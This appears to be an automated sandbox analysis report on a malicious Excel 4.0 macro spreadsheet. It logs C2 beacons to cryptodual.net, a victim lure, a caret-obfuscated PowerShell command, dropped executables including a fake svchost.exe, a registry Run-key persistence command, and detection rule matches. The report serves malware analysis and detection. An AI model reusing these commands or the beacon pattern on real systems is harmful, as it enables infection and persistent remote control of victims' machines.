Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: unknown

Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.c
Source: powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanenTZ
Source: powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 0	Screenshot OCR: Enable Content from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 1	Screenshot OCR: Enable Content from the yellow bar above

Found Excel 4.0 Macro with suspicious formulas

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: High usage of CHAR() function: 21

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\ps.exe

Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DF6 NtQuerySystemInformation,	24_2_00AD1DF6
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DC5 NtQuerySystemInformation,	24_2_00AD1DC5
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D66 NtQuerySystemInformation,	32_2_01F31D66
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D30 NtQuerySystemInformation,	32_2_01F31D30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A0F79	24_2_004A0F79
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2840	24_2_004A2840
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2832	24_2_004A2832
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A25F0	24_2_004A25F0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A57CC	24_2_004A57CC
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0040C090	27_2_0040C090
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041A390	27_2_0041A390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00414C70	27_2_00414C70
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00410C10	27_2_00410C10
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00411270	27_2_00411270
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004136C0	27_2_004136C0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00417A93	27_2_00417A93
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C0F79	32_2_003C0F79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2834	32_2_003C2834
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2840	32_2_003C2840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C25F0	32_2_003C25F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C57CC	32_2_003C57CC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00400F87	39_2_00400F87
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402840	39_2_00402840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402832	39_2_00402832
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004025F0	39_2_004025F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004057CC	39_2_004057CC

Document contains embedded VBA macros

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0042AFA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0040FCB0 appears 97 times

PE file contains strange resources

Source: ps.exe.23.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.27.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses reg.exe to modify the Windows registry

Source: unknown

Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe

Yara signature match

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research

Source: ps.exe.23.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost.exe.27.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@60/23@4/3

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C7A AdjustTokenPrivileges,	24_2_00AD1C7A
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C43 AdjustTokenPrivileges,	24_2_00AD1C43
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31806 AdjustTokenPrivileges,	32_2_01F31806
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F317CF AdjustTokenPrivileges,	32_2_01F317CF
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B1806 AdjustTokenPrivileges,	39_2_006B1806
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B17CF AdjustTokenPrivileges,	39_2_006B17CF

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\D4FE0000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\lCYThKzk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-global_lock_spinlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREC70.tmp

Jump to behavior

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....J................T.............}..v....(K......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....8O......0.................b.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....O................T.............}..v....pP......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....T...... .................b.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....8U................T.............}..v.....U......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G...............>/.j......b...............T.............}..v....H\......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j.....]................T.............}..v.....]......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S...............>/.j......b...............T.............}..v.....b......0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....`c................T.............}..v.....c......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._...............>/.j......b...............T.............}..v.....i......0.......................Z.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._..................j.....i................T.............}..v....8j......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k...............>/.j......b...............T.............}..v.....q......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j.....q................T.............}..v....8r......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....u......0.................b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w..................j.....v................T.............}..v.....w......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......>/.j......b...............T.............}..v.....z......0.................b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X{................T.............}..v.....{......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................#.j.....n................T.............}..v....8o......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....Hs......0...............8.d.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../................#.j.....t................T.............}..v.....t......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....x......0...............8.d.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;................#.j....Hy................T.............}..v.....y......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................<.j......d...............T.............}..v.....~......0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................#.j......................T.............}..v....(.......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................<.j......d...............T.............}..v....P.......0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................#.j......................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................<.j......d...............T.............}..v............0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................#.j....h.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................<.j......d...............T.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................#.j....h.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............8.d.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w................#.j......................T.............}..v....0.......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ........<.j......d...............T.............}..v............0...............8.d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................#.j....x.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............m.o.d.e........./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .1.8.,.1. .............................*Y>.....m.o.d.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....m.o.d.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............c.o.l.o.r......./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .F.E. .................................*Y>.....c.o.l.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....c.o.l.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t.l.o.c.a.l./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....s.e.t.l..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h..................................J....................J^>.....`{.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............f.o.r...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.F...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .%.i. .i.n. ...=.4.-.5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(.'.v.e.r.'.). .d.o. .5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t...........d.o. .5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.%.i...%.j. ............Y>.....s.e.t............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................p.C......................S>..............iB.......................$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t............\C.......................B...............C........J....x.........$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.6...1. ................^>.....s.e.t....iB.....................h.$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................=.6...1..................^>.....s.e.t....iB.....................h.$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................`{.J....................J^>......$.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".1.0...0.". ..........Y>.....i.f. ............DB...............$..... .......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB..................... .......................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>.....(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......T.......................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DB...............$.....0.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........}..v............................p.......f.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................X>.....r.e.g............DB.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................ZX>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v............................................................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............s.c.h.t.a.s.k.s.}..v............................p.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p.......................................................J_>.....s.c.h.t..........DB.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
